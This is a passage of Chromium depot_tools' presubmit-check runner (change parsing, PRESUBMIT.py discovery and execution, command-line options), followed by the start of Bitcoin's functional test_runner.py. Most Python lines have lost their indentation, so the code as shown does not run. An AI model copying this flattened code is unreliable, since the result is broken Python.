DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the 'left hand side'.
Contents will be empty if the file is a directory or does not exist.
    Note: The line endings (LF or CRLF) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the 'right hand
side'.
Contents will be empty if the file is a directory or does not exist.
    Note: The line endings (LF or CRLF) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
except UnicodeDecodeError as e:
# log the filename since we're probably trying to read a binary
# file, and shouldn't be.
print('Error reading %s: %s' % (self.AbsoluteLocalPath(), e))
raise
return self._cached_new_contents[:]
def ChangedContents(self, keeplinebreaks=False):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
# Don't return cached results when line breaks are requested.
if not keeplinebreaks and self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
result = []
line_num = 0
# The keeplinebreaks parameter to splitlines must be True or else the
# CheckForWindowsLineEndings presubmit will be a NOP.
for line in self.GenerateScmDiff().splitlines(keeplinebreaks):
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
result.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
# Don't cache results with line breaks.
if keeplinebreaks:
      return result
self._cached_changed_contents = result
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or 'tag') lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
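  # For example, a description line "BUG=123" is parsed as a tag line, so
  # tags['BUG'] == '123' and the line is stripped from DescriptionText().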
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def UpstreamBranch(self):
"""Returns the upstream branch for the change."""
return self._upstream
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. 'FOO='
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or 'tag' lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def AddDescriptionFooter(self, key, value):
"""Adds the given footer to the change description.
Args:
key: A string with the key for the git footer. It must conform to
the git footers format (i.e. 'List-Of-Tokens') and will be case
normalized so that each token is title-cased.
value: A string with the value for the git footer.
"""
description = git_footers.add_footer(
self.FullDescriptionText(), git_footers.normalize_name(key), value)
self.SetDescriptionText(description)
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r'^[A-Z_]*$', attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def GitFootersFromDescription(self):
"""Return the git footers present in the description.
Returns:
footers: A dict of {footer: [values]} containing a multimap of the footers
in the change description.
"""
return git_footers.parse_footers(self.FullDescriptionText())
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
bug_tags = ['BUG', 'FIXED']
tags = []
for tag in bug_tags:
values = self.tags.get(tag)
if values:
tags += [value.strip() for value in values.split(',')]
footers = []
parsed = self.GitFootersFromDescription()
unsplit_footers = parsed.get('Bug', []) + parsed.get('Fixed', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a 'R:' git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(crbug.com/839208): Remove support for 'Tbr:' when TBRs are
# programmatically determined by self-CR+1s.
footers = self.GitFootersFromDescription().get('Tbr', [])
return sorted(set(tags + footers))
# TODO(crbug.com/753425): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = list(filter(file_filter, self._affected_files))
if include_deletes:
return affected
return list(filter(lambda x: x.Action() != 'D', affected))
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
      warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in 'new' version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return {f.LocalPath(): f.OldContents() for f in files}
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).decode('utf-8', 'ignore').splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = {os.path.dirname(f) for f in files}
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
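# For example (paths are illustrative): for files ['a/b/foo.cc'] under root
# '/repo', the candidate directories are /repo/a/b, /repo/a and /repo, and
# every PRESUBMIT*.py found there is returned, except PRESUBMIT_test* files.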
class GetPostUploadExecuter(object):
def __init__(self, use_python3):
"""
Args:
use_python3: if true, will use python3 instead of python2 by default
if USE_PYTHON3 is not specified.
"""
self.use_python3 = use_python3
def ExecPresubmitScript(self, script_text, presubmit_path, gerrit_obj,
change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
gerrit_obj: The GerritAccessor object.
change: The Change object.
Return:
A list of results objects.
"""
if not _ShouldRunPresubmit(script_text, self.use_python3):
return {}
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(gerrit_obj, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.items(),
masters2.items()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoPostUploadExecuter(change, gerrit_obj, verbose, use_python3=False):
"""Execute the post upload hook.
Args:
change: The Change object.
gerrit_obj: The GerritAccessor object.
verbose: Prints debug info.
use_python3: if true, default to using Python3 for presubmit checks
rather than Python2.
"""
python_version = 'Python %s' % sys.version_info.major
sys.stdout.write('Running %s post upload checks ...\n' % python_version)
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
executer = GetPostUploadExecuter(use_python3)
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, gerrit_obj, change))
if not results:
return 0
sys.stdout.write('\n')
sys.stdout.write('** Post Upload Hook Messages **\n')
exit_code = 0
for result in results:
if result.fatal:
exit_code = 1
result.handle()
sys.stdout.write('\n')
return exit_code
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None,
thread_pool=None, parallel=False, use_python3=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
use_python3: if true, will use python3 instead of python2 by default
if USE_PYTHON3 is not specified.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
self.use_python3 = use_python3
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
if not _ShouldRunPresubmit(script_text, self.use_python3):
return []
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
presubmit_dir = os.path.dirname(presubmit_path)
os.chdir(presubmit_dir)
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
context['__args'] = (input_api, output_api)
# Get path of presubmit directory relative to repository root.
# Always use forward slashes, so that path is same in *nix and Windows
root = input_api.change.RepositoryRoot()
rel_path = os.path.relpath(presubmit_dir, root)
rel_path = rel_path.replace(os.path.sep, '/')
# Get the URL of git remote origin and use it to identify host and project
host = project = ''
if self.gerrit:
host = self.gerrit.host or ''
project = self.gerrit.project or ''
# Prefix for test names
prefix = 'presubmit:%s/%s:%s/' % (host, project, rel_path)
# Perform all the desired presubmit checks.
results = []
try:
version = [
int(x) for x in context.get('PRESUBMIT_VERSION', '0.0.0').split('.')
]
with rdb_wrapper.client(prefix) as sink:
if version >= [2, 0, 0]:
# Copy the keys to prevent "dictionary changed size during iteration"
# exception if checks add globals to context. E.g. sometimes the
# Python runtime will add __warningregistry__.
for function_name in list(context.keys()):
if not function_name.startswith('Check'):
continue
if function_name.endswith('Commit') and not self.committing:
continue
if function_name.endswith('Upload') and self.committing:
continue
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
else: # Old format
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in list(context.keys()):
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
for f in input_api._named_temporary_files:
os.remove(f)
# Return the process to the original working directory.
os.chdir(main_path)
return results
def _run_check_function(self, function_name, context, sink=None):
"""Evaluates and returns the result of a given presubmit function.
If sink is given, the result of the presubmit function will be reported
to the ResultSink.
Args:
function_name: the name of the presubmit function to evaluate
context: a context dictionary in which the function will be evaluated
sink: an instance of ResultSink. None, by default.
Returns:
the result of the presubmit function call.
"""
start_time = time_time()
try:
result = eval(function_name + '(*__args)', context)
self._check_result_type(result)
except Exception:
if sink:
elapsed_time = time_time() - start_time
sink.report(function_name, rdb_wrapper.STATUS_FAIL, elapsed_time)
# TODO(crbug.com/953884): replace reraise with native py3:
# raise .. from e
e_type, e_value, e_tb = sys.exc_info()
print('Evaluation of %s failed: %s' % (function_name, e_value))
six.reraise(e_type, e_value, e_tb)
elapsed_time = time_time() - start_time
if elapsed_time > 10.0:
sys.stdout.write(
'%s took %.1fs to run.\n' % (function_name, elapsed_time))
if sink:
status = rdb_wrapper.STATUS_PASS
if any(r.fatal for r in result):
status = rdb_wrapper.STATUS_FAIL
sink.report(function_name, status, elapsed_time)
return result
def _check_result_type(self, result):
"""Helper function which ensures result is a list, and all elements are
instances of OutputApi.PresubmitResult"""
if not isinstance(result, (tuple, list)):
raise PresubmitFailure('Presubmit functions must return a tuple or list')
if not all(isinstance(res, OutputApi.PresubmitResult) for res in result):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
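# Illustrative sketch (hypothetical check name and message, not part of this
# module): a minimal PRESUBMIT.py check satisfying the contract enforced above.
# The executer only requires the 'Check' prefix, the (input_api, output_api)
# signature, and a list of OutputApi.PresubmitResult instances as return value.
#
#   PRESUBMIT_VERSION = '2.0.0'
#
#   def CheckChangeHasDescription(input_api, output_api):
#     if not input_api.change.DescriptionText().strip():
#       return [output_api.PresubmitResult('Please add a change description.')]
#     return []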
def DoPresubmitChecks(change,
committing,
verbose,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None,
use_python3=False):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
use_python3: if true, default to using Python3 for presubmit checks
rather than Python2.
Return:
1 if presubmit checks failed or 0 otherwise.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
python_version = 'Python %s' % sys.version_info.major
if committing:
sys.stdout.write('Running %s presubmit commit checks ...\n' %
python_version)
else:
sys.stdout.write('Running %s presubmit upload checks ...\n' %
python_version)
start_time = time_time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel, use_python3)
if default_presubmit:
if verbose:
sys.stdout.write('Running default presubmit script.\n')
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
messages = {}
should_prompt = False
presubmits_failed = False
for result in results:
if result.fatal:
presubmits_failed = True
messages.setdefault('ERRORS', []).append(result)
elif result.should_prompt:
should_prompt = True
messages.setdefault('Warnings', []).append(result)
else:
messages.setdefault('Messages', []).append(result)
for name, items in messages.items():
sys.stdout.write('** Presubmit %s **\n' % name)
for item in items:
item.handle()
sys.stdout.write('\n')
total_time = time_time() - start_time
if total_time > 1.0:
sys.stdout.write(
'Presubmit checks took %.1fs to calculate.\n' % total_time)
if not should_prompt and not presubmits_failed:
sys.stdout.write('%s presubmit checks passed.\n\n' % python_version)
elif should_prompt and not presubmits_failed:
sys.stdout.write('There were %s presubmit warnings. ' % python_version)
if may_prompt:
presubmits_failed = not prompt_should_continue(
'Are you sure you wish to continue? (y/N): ')
else:
sys.stdout.write('\n')
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format()
for error in messages.get('ERRORS', [])
],
'notifications': [
notification.json_format()
for notification in messages.get('Messages', [])
],
'warnings': [
warning.json_format()
for warning in messages.get('Warnings', [])
],
'more_cc': executer.more_cc,
}
gclient_utils.FileWrite(
json_output, json.dumps(presubmit_results, sort_keys=True))
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (results and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
sys.stdout.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return 1 if presubmits_failed else 0
finally:
os.environ = old_environ
def _scan_sub_dirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def _parse_files(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in _scan_sub_dirs(arg, recursive)])
return files
def _parse_change(parser, options):
"""Process change options.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GitChange if the change root is a git repository, or a Change otherwise.
"""
if options.files and options.all_files:
parser.error('<files> cannot be specified when --all-files is set.')
change_scm = scm.determine_scm(options.root)
if change_scm != 'git' and not options.files:
parser.error('<files> is not optional for unversioned directories.')
if options.files:
change_files = _parse_files(options.files, options.recursive)
elif options.all_files:
change_files = [('M', f) for f in scm.GIT.GetAllFiles(options.root)]
else:
change_files = scm.GIT.CaptureStatus(
options.root, options.upstream or None)
logging.info('Found %d file(s).', len(change_files))
change_class = GitChange if change_scm == 'git' else Change
return change_class(
options.name,
options.description,
options.root,
change_files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream)
def _parse_gerrit_options(parser, options):
"""Process gerrit options.
SIDE EFFECTS: Modifies options.author and options.description from Gerrit if
options.gerrit_fetch is set.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GerritAccessor object if options.gerrit_url is set, or None otherwise.
"""
gerrit_obj = None
if options.gerrit_url:
gerrit_obj = GerritAccessor(
url=options.gerrit_url,
project=options.gerrit_project,
branch=options.gerrit_branch)
if not options.gerrit_fetch:
return gerrit_obj
if not options.gerrit_url or not options.issue or not options.patchset:
parser.error(
'--gerrit_fetch requires --gerrit_url, --issue and --patchset.')
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(
options.issue, options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
return gerrit_obj
@contextlib.contextmanager
def canned_check_filter(method_names):
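"""Context manager that temporarily disables the named canned checks.
Each existing attribute of presubmit_canned_checks named in method_names is
replaced with a stub returning an empty result list and restored on exit;
unknown names are skipped with a warning.
"""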
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warning('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.items():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = argparse.ArgumentParser(usage='%(prog)s [options] <files...>')
hooks = parser.add_mutually_exclusive_group()
hooks.add_argument('-c', '--commit', action='store_true',
help='Use commit instead of upload checks.')
hooks.add_argument('-u', '--upload', action='store_false', dest='commit',
help='Use upload instead of commit checks.')
hooks.add_argument('--post_upload', action='store_true',
help='Run post-upload commit hooks.')
parser.add_argument('-r', '--recursive', action='store_true',
help='Act recursively.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Use 2 times for more debug info.')
parser.add_argument('--name', default='no name')
parser.add_argument('--author')
desc = parser.add_mutually_exclusive_group()
desc.add_argument('--description', default='', help='The change description.')
desc.add_argument('--description_file',
help='File to read change description from.')
parser.add_argument('--issue', type=int, default=0)
parser.add_argument('--patchset', type=int, default=0)
parser.add_argument('--root', default=os.getcwd(),
help='Search for PRESUBMIT.py up to this directory. '
'If inherit-review-settings-ok is present in this '
'directory, parent directories up to the root file '
'system directories will also be searched.')
parser.add_argument('--upstream',
help='Git only: the base ref or upstream branch against '
'which the diff should be computed.')
parser.add_argument('--default_presubmit')
parser.add_argument('--may_prompt', action='store_true', default=False)
parser.add_argument('--skip_canned', action='append', default=[],
help='A list of checks to skip which appear in '
'presubmit_canned_checks. Can be provided multiple times '
'to skip multiple canned checks.')
parser.add_argument('--dry_run', action='store_true', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_url', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_project', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_branch', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_fetch', action='store_true',
help=argparse.SUPPRESS)
parser.add_argument('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in '
'all PRESUBMIT files in parallel.')
parser.add_argument('--json_output',
help='Write presubmit errors to json output.')
parser.add_argument('--all_files', action='store_true',
help='Mark all files under source control as modified.')
parser.add_argument('files', nargs='*',
help='List of files to be marked as modified when '
'executing presubmit or post-upload hooks. fnmatch '
'wildcards can also be used.')
parser.add_argument('--use-python3', action='store_true',
help='Use python3 for presubmit checks by default')
options = parser.parse_args(argv)
log_level = logging.ERROR
if options.verbose >= 2:
log_level = logging.DEBUG
elif options.verbose:
log_level = logging.INFO
log_format = ('[%(levelname).1s%(asctime)s %(process)d %(thread)d '
'%(filename)s] %(message)s')
logging.basicConfig(format=log_format, level=log_level)
if options.description_file:
options.description = gclient_utils.FileRead(options.description_file)
gerrit_obj = _parse_gerrit_options(parser, options)
change = _parse_change(parser, options)
try:
if options.post_upload:
return DoPostUploadExecuter(change, gerrit_obj, options.verbose,
options.use_python3)
with canned_check_filter(options.skip_canned):
return DoPresubmitChecks(
change,
options.commit,
options.verbose,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output,
options.use_python3)
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
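# Illustrative invocations (the script and file names are hypothetical; the
# flags are the ones defined by the parser above):
#
#   python presubmit_support.py --root . --all_files --json_output out.json
#   python presubmit_support.py --commit --may_prompt foo.cc bar.h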
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017-2020 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# Primitive formatting on supported
# terminals via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but
# are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some tests can be run with additional parameters.
# When a test is listed here, it will be run without parameters
# as well as with the additional parameters listed here.
# For example:
# "testName" : [["--param1", "--param2"], ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testName --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_createwallet.py": [["--usecli"]],
"wallet_multiwallet.py": [["--usecli"]],
}
